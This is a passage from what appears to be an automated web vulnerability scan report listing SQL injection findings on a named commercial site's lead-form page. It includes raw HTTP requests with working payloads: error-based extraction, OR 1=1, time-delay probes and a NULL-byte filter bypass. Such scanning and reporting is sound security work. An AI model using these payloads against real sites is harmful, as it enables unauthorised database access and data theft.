User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:03:16 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7238
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002 OR X='ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accoun' at line 5

1.320. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00'/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response 1

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=pet0n1djhopedelhfegtv8ov40; path=/
Content-Length: 4094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00''/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response 2

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=muofe0klnh4u7un92a6tdbr1j2; path=/
Content-Length: 3917
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.321. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php'?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response 1

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:33 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=lme8knucmuhqu6p31tp9d5jdc3; path=/
Content-Length: 4094
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00/project.php''?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __utma=253555158.1232491105.1300018899.1300018899.1300018899.1; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2

Response 2

HTTP/1.1 200 OK
Date: Sun, 13 Mar 2011 23:00:33 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=1prdg020nv1ktm3l3m5s6d99f0; path=/
Content-Length: 3917
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...

1.322. http://www.insideup.com/ppc/leadflow/hins00/project.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 4, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php'?catId=50002+OR+X%3d'ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=4dobj8gl0r8jekvsqrcejsr783; JSESSIONID=30ABD5D342EFB2121A067D10C4B56069; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:03:23 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7238
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?catId=50002 OR X='ss&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accoun' at line 5

1.323. http://www.insideup.com/ppc/leadflow/hins00/project.php [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.google.com/search?hl=en&q='
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:38 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=fkkgtkj77dkucf6mj0nghqn880; path=/
Content-Length: 7310
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.324. http://www.insideup.com/ppc/leadflow/hins00/project.php [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the User-Agent HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=%27;WAITFOR%20DELAY%20%270:0:25%27--&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)'
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 02:02:36 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=rfhbumq8b6d9vc43r7frsijsi5; path=/
Content-Length: 7310
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
les&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&attributeId_342_g=2017__Accounting/Finance&attributeId' at line 5

1.325. http://www.insideup.com/ppc/leadflow/hins00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address%00'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=&attributeId_491_t=&attributeId_492_t=&attributeId_493_t=&attributeId_514_t=&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=&attributeId_556_t=&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=bg5bamf9r296qlbk2sumhl6ko7; JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:15:50 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 7118
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
ibles&attributeId_555_t=&attributeId_556_t=&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=50002&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2742__None currently&attributeId_487[]=3199__Not sure&attributeId_488[]=3205_' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address%00''&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421=2739__No&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=&attributeId_491_t=&attributeId_492_t=&attributeId_493_t=&attributeId_514_t=&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=&attributeId_556_t=&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: PHPSESSID=bg5bamf9r296qlbk2sumhl6ko7; JSESSIONID=7DCBAF96E588A764816BB2D777B6D36B; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 04:17:43 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36095


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <base href="http://www
...[SNIP]...

1.326. http://www.insideup.com/ppc/leadflow/hins00/project.php [address parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The address parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the address parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc&address=Address'&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_421='+OR+'1'%3d'1&attributeId_422%5B%5D=2742__None+currently&attributeId_487%5B%5D=3199__Not+sure&attributeId_488%5B%5D=3205__Dental+insurance&attributeId_489_t=3&attributeId_491_t=3&attributeId_492_t=3&attributeId_493_t=3&attributeId_514_t=3&attributeId_515=3353__+Yes+-+higher+deductibles&attributeId_555_t=3&attributeId_556_t=3&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=50002&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/hins00/project.php?catId=50002&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
